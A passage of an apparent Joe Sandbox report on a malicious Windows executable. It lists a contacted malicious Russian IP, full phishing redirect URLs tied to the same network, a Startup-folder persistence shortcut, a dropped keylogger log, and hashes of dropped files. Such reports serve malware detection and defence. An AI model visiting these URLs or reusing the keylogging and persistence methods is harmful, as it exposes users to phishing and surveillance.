                                                                                                                                                                  https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-objectYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://github.com/nodejs/node/issues/19009YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://sindresorhus.comYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://fetch.spec.whatwg.org/#fetch-methodYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://pypi.python.org/pypi/pyfakefsYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://github.com/mafintosh/tar-stream.gitYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high

                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public IPs

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        185.42.12.39
                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                        		56784MULTIHOST-ASRUtrue

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1570242
                                                                                                                                                                        Start date and time:2024-12-06 17:32:19 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 13m 42s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:52
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:YoS6ZBCcUy.exe
                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                        Original Sample Name:9e19fd2499e9ffb9ca4eab08d9054a86.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.spre.spyw.evad.winEXE@65/132@0/1
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 60%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 85%
                                                                                                                                                                        • Number of executed functions: 97
                                                                                                                                                                        • Number of non-executed functions: 236
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                        Warnings

                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 1020 because it is empty
                                                                                                                                                                        • Execution Graph export aborted for target winSAT.exe, PID 7232 because there are no executed function
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                        • VT rate limit hit for: YoS6ZBCcUy.exe

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        11:33:45API Interceptor22x Sleep call for process: YoS6ZBCcUy.exe modified
                                                                                                                                                                        11:34:05API Interceptor106x Sleep call for process: powershell.exe modified
                                                                                                                                                                        11:34:46API Interceptor4866773x Sleep call for process: Bginfo.exe modified
                                                                                                                                                                        16:34:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        No context

                                                                                                                                                                        Domains

                                                                                                                                                                        No context

                                                                                                                                                                        ASNs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        MULTIHOST-ASRUhttps://link.mail.beehiiv.com/ls/click?upn=u001.zV-2FAVEm-2FntcfbYMbzjaqbHvRntm2Ch-2FIT3iAZTh1wdhmle-2BfM-2B56GWeitj2iKgrv-2BRh6LFg-2B7XJNdfGDzLI-2F6G-2BCgCV-2F1hbnBY-2Bs68xhxIsPze8eMoFFw95WGw-2Bls1FbsMcp2q-2BMyOHWUbhhJ3dyUUQbbHo5Bc5jcddntgOAcg83c9Y-2BHpozMO4kEhTRKyaYoy0B_04d4ywoI7MJdsiYCN-2BN3DRokyyftAUUqxoS643FQiieXrbGePihRfkwxbBQsrSRFEbQhaAWRqPf6x8hsxbj7wyoDnXKtKlkIQNvW1HQSVO3-2FppYjZanyVIKJ3B5fTHTCmhW-2FSQw5pfCuZ237qTdTFRzPRls-2BsDSXHbUjgleJLj2TXoghlp8Knn02eWegAFfH122XbuUduLJuNPGFOZwz4Kvf-2Fo2LnYKZvMtQo0mmSiPXqk2ADEPyC5XI-2FfIDM30q7spXknklrbrg422wMtkaWYGaAwzxHbTN8dTZCVd5CVsVni7tya7imFydLETXRhWbBtuBYFnLHmZLc-2BQNaA0wJvaPHfkNiu60ZMNhV2yPSeR4q7qQL70X-2BhwpZ6qbVNjsqGlVw9dGVHU8N0OffkcnliInFNfjRuRP9VJmDs0p-2FlY-2Btg78PmROw69HhltDLVeaGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 185.42.14.120
                                                                                                                                                                        https://pfa.levexis.com/clarks/tman.cgi?tmad=tmcampid%11&tmplaceref=iteo&tmclickref=tional2&tmloc=https://click.snapchat.com/aVHG?pid=chat_download_page&af_dp=http://20579.google.com&af_web_dp=http://adumpis.maboetours.co.za/?=adumpis@greendotcorp.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 185.42.12.128
                                                                                                                                                                        http://clickserve.dartsearch.net/link/click?&ds_a_cid=680760384&ds_a_caid=12694754542&ds_a_agid=123477218634&ds_a_fiid=&ds_a_lid=&&ds_e_adid=512650395034&ds_e_matchtype=&ds_e_device=c&ds_e_network=&&ds_url_v=2&ds_dest_url=https://vbo45.com/wp/wMz#arf@arf.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 185.42.12.128
                                                                                                                                                                        9071-wav-audio-sguroff-Thekaizencompany.HTMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 185.42.12.128
                                                                                                                                                                        U6h9mkMz7g.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                                        • 185.42.12.131
                                                                                                                                                                        EFT_Paid.htm.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 185.42.12.128
                                                                                                                                                                        wav_audio_Viha_#VGHUEZ.HTMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 185.42.12.128
                                                                                                                                                                        malicious.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 185.42.12.128
                                                                                                                                                                        Eft Remittance.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 185.42.12.128
                                                                                                                                                                        Eft Remittance.htm.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        • 185.42.12.128

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        No context

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dllG4fDWS1Fpd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          a2zZyepQzF.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                            kCKthbZCUf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              G4fDWS1Fpd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                a2zZyepQzF.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                  kCKthbZCUf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    cMqyGFCQHk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      cMqyGFCQHk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        Soltix.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          Soltix.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\ProgramData\jesusapt\logs.dat

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                            Entropy (8bit):3.3867890666236815
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:rhlKlyKwl8QlfNNqlDl5JWRal2Jl+7R0DAlBG4moojklovDl6v:6lZwlzF4b5YcIeeDAlS1gWAv
                                                                                                                                                                                            MD5:9B4280DA42FA2027360DCDD2D0427824
                                                                                                                                                                                            SHA1:BEEC7BF9D6DF9CDE5246C2A65DD4B878E5540759
                                                                                                                                                                                            SHA-256:F54F7F20B7C5144500C8DA5D4A14AA6674E9604CE5C380487416E28581C4DA70
                                                                                                                                                                                            SHA-512:6B56FF4BC00C4DA43EE2711D42CA084DCC496D7AAF15E40C99575A3A7178F245F103634927C70AA26B0DFA76DC0D88820D5D1499138B177E80C21B9B1F8E5B5F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....[.2.0.2.4./.1.2./.0.6. .1.1.:.3.4.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                                                                            C:\Users\user\AppData\Local\D3DSCache\936c00a8a22f7407\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65552
                                                                                                                                                                                            Entropy (8bit):0.01264908944072593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:2HlGlll/l/lXp9ZjrPBY0lllt6Jll/DP:Q0dPBY0l/m/7
                                                                                                                                                                                            MD5:566AA8F49C78E579C56ED41C59BFEB7E
                                                                                                                                                                                            SHA1:FA328DD4147ECD6A884327606BEE24C6DFB6AE51
                                                                                                                                                                                            SHA-256:EB5561845D56824EAC51A1F7FB2336962A4BCFE886E6B96FEC8B557060A7B307
                                                                                                                                                                                            SHA-512:BCBF21F45D7F5E69BC2FD4C3BB2FA9C88B4B3C3B779BCFC9D64D456E572E8B63A7128BBBC998565FCCB5EE32F465FA9CD2F6352C180D489D0DC43A546103DA16
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..$.........................................f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\D3DSCache\936c00a8a22f7407\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:R:R
                                                                                                                                                                                            MD5:F49655F856ACB8884CC0ACE29216F511
                                                                                                                                                                                            SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                                                                                                                                            SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                                                                                                                                            SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:EERF

                                                                                                                                                                                            C:\Users\user\AppData\Local\D3DSCache\936c00a8a22f7407\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                            Entropy (8bit):0.025208649790775896
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:9llvlVbd2DJqojrwRAal0dhOEjlpQlyEXl1lAbl7VC5KCCLaldatt3llaia9sVQr:q9q0sRKUEZ+lX1IbRUUvm6tT2Hrn
                                                                                                                                                                                            MD5:CA79AE151CFA2528F44E91763BFC38D6
                                                                                                                                                                                            SHA1:2537D33C167B6CDB2E9A214BB75369EB457C68CF
                                                                                                                                                                                            SHA-256:49636115365E4B80194ACE85CC4B6E30F9C414E6272163E3621D8C9644EA2AB2
                                                                                                                                                                                            SHA-512:25EB6735657C94AA7052C8BB113B0121FF8031E3414F09DFA50EE763542DD7144600B42693768F03E41CB6B8B1B9778DC77AD16535EBF2BB50436524056A3AED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:................h...(....x:no.&A.e.u~+..C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.N.S.I.S.\.N.S.I.S...e.x.e.......................(...p.DJ!.IL.....Zm.F............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:@...e...........................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\LICENSE.electron.txt

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1096
                                                                                                                                                                                            Entropy (8bit):5.13006727705212
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                            MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                            SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                            SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                            SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\LICENSES.chromium.html

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9099045
                                                                                                                                                                                            Entropy (8bit):4.754770173605162
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:2o9dQ06p6j6j1WOwRiXjYmfy6k6mjK64jK6gjK6e6cjK6feGjl8PpE:BFOeGT
                                                                                                                                                                                            MD5:6FF57C0AECCDF44C39C95DEE9ECEA805
                                                                                                                                                                                            SHA1:C76669A1354067A1C3DDBC032E66C323286A8D43
                                                                                                                                                                                            SHA-256:0BA4C7B781E9F149195A23D3BE0F704945F858A581871A9FEDD353F12CE839CA
                                                                                                                                                                                            SHA-512:D6108E1D1D52AA3199FF051C7B951025DBF51C5CB18E8920304116DCEF567367ED682245900FDA3AD354C5D50AA5A3C4E6872570A839A3A55D3A9B7579BDFA24
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title">Credits</span>.<a id="print-link" href="#" hidden>Print</a>.<label class="show show-all" tabindex="0">.<input type="checkbox" hidden>.</label>.<div class="open-sourced">. Chromium software is made available as source code. <a href="https://source.chromium.org/chromium">here</a>..</div>..<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<labe

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):188826112
                                                                                                                                                                                            Entropy (8bit):6.758169658073029
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1572864:1wl41lgY+w9QLv1JWYc6UeOtUUGQUT1jdu4BPPuuwT2GOqiB1sr7zjg7ob753oUV:rF4oD0QdG09P
                                                                                                                                                                                            MD5:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            SHA1:1D32E6F1C6BA770C3B2625D0241BE0F2D4581B5D
                                                                                                                                                                                            SHA-256:A674229C90366A8300AD63C8AE675C2BC1C12307BCCB00AE818DFA67C1955BF5
                                                                                                                                                                                            SHA-512:40966C176EAF9E025597599CB99532B3C36C3E72BCF991B95A450EB26F663B61A79933D741CCE807E18C198239E3C49973189E9EB2CDBAF4B29115A6C25FF09A
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......FH.........`IY........@.............................P............`..........................................d..k...0...h....`m.......#...H...........q..5..P.......................0...(....}H.@............................................text...*DH......FH................. ..`.rdata.......`H......LH.............@..@.data....H......L..................@....pdata....H...#...H.................@..@.gxfg....B...pl..D....-.............@..@.retplne......l......*...................rodata.......l......,.............. ..`.tls..........l......>..............@...CPADinfo8.....m......D..............@...LZMADEC.......m......F.............. ..`_RDATA.......0m......X..............@..@malloc_h.....@m......Z.............. ..`prot.........Pm......\..............@..@.rsrc........`m......^..............@..@.reloc...5....q..6....2.............@..B................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\chrome_100_percent.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):151599
                                                                                                                                                                                            Entropy (8bit):7.915992368779121
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:ez8JCGIdTwTPagr8o9RHi/T9P1L2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:ez81IdT8agr8EC/T95K18Gb0OV8ld0Gq
                                                                                                                                                                                            MD5:83EC43F2AF9FC52025F3F807B185D424
                                                                                                                                                                                            SHA1:EA432F7571D89DD43A76D260CB5853CADA253AA0
                                                                                                                                                                                            SHA-256:A659EE9EB38636F85F5336587C578FB29740D3EFFAFF9B92852C8A210E92978C
                                                                                                                                                                                            SHA-512:6DDCA85215BF6F7F9B17C5D52BD7395702515BC2354A8CD8FA6C1CCD7355A23B17828853CEABEEF597B5BCA11750DC7C9F6EC3C45A33C2106F816FEC74963D86
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..........<.............h.....i.\...j.....k.I...l.....n.....o.....p.:...q.4...r.o...s.?...t..!..u..%..v.@'..w..1..x..<..y.l?..z..C..{..G..|..I..}..J..~..M.....O.....R....|V.....Z.....]....N`.....a....3c....gd.....e....@g.....g.....m....~s....Fw....&{.....~..........*.....m................8..........._...........1....V.............w....e........F.........'....Z....k....5...,.....-.h........./.....0.!...1.....6.f...7.....8..!....$....&...../.....1.....5....3:....CE.....F....(O.....U....b[.....`....g....^i.....m.....q....V{....v~..............R...............X.....#.................................................|.....S..........W...........i..........2.....`...........S...........S.....(............................s...........y.....N.....".......................&.............................................Q"....-#.....#....$....v%....?&.....&....*(.... ).....*...........2....33....3.....3.....4....5....v6.....6.....7....f7....7.....7.....>.....A....sB

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\chrome_200_percent.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):228644
                                                                                                                                                                                            Entropy (8bit):7.946488830213853
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:coDQYajN6svyA6nI86ur8EC/T9ugx5GMRejnbdZnVE6YoppO4:cVfjN6svyA6D4B79a6edhVELoXO4
                                                                                                                                                                                            MD5:DC48A33BD20BFC7CACFC925A84B015B6
                                                                                                                                                                                            SHA1:8DFEE88FD1DC77F89AD88C19146FE3AB45E43F3C
                                                                                                                                                                                            SHA-256:2C1B3E4B8A0CF837AE0A390FCA54F45D7D22418E040F1DFEA979622383ACCED6
                                                                                                                                                                                            SHA-512:1D54EB5D2BA06AF0BA8F6B491B0D43F178A48AC82CDF383BEB265E732DDFC06BCA9692003FDFCE56F7F00AF97F29ACF046C73B891B8C561610098F9626EAF05A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..........<.........&...h.....i.....j.....k.....l.....n.....o.|%..p..*..q..-..r.85..s..:..t..>..u.CG..v..K..w.._..x._t..y.{y..z....{.4...|....}.m...~...............................................h.............................5.................t...........-.................D............$.....-....K9.....@....FH...bL...9O...nT...)U...jV...UZ....]...s`...xc...f....j...n..,.\r..-..s....ku../..v..0..w..1.Dx..6..x..7.....8.Q............................F................S..........{...........^.....@...........!....%....&/....R2....:....>....RH....R.....V....|X....Sa.....i....k.....n.....r.....y.....{....%..........`.....7...........................................0.....I..........;.....l.....b.....B.....%.....S.....m..........L...........R..........V...........g.....)........................!.....'....-....u3.....4.....5.....6.....8....:9.....:.....<....=....`?....$L.....\....v\.....\....;].....]....._....._....K`....`.....a....]a....a.....g.....k....Rl

                                                                                                                                                                                            C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4916728
                                                                                                                                                                                            Entropy (8bit):6.398031738914566
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:hCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRN1:oG2QCwmHjnog/pzHAo/Ayc
                                                                                                                                                                                            MD5:A7B7470C347F84365FFE1B2072B4F95C
                                                                                                                                                                                            SHA1:57A96F6FB326BA65B7F7016242132B3F9464C7A3
                                                                                                                                                                                            SHA-256:AF7B99BE1B8770C0E4D18E43B04E81D11BDEB667FA6B07ADE7A88F4C5676BF9A
                                                                                                                                                                                            SHA-512:83391A219631F750499FD9642D59EC80FB377C378997B302D10762E83325551BB97C1086B181FFF0521B1CA933E518EAB71A44A3578A23691F215EBB1DCE463D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: G4fDWS1Fpd.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: a2zZyepQzF.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: kCKthbZCUf.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: G4fDWS1Fpd.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: a2zZyepQzF.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: kCKthbZCUf.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: cMqyGFCQHk.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: cMqyGFCQHk.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Soltix.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Soltix.exe, Detection: malicious, Browse
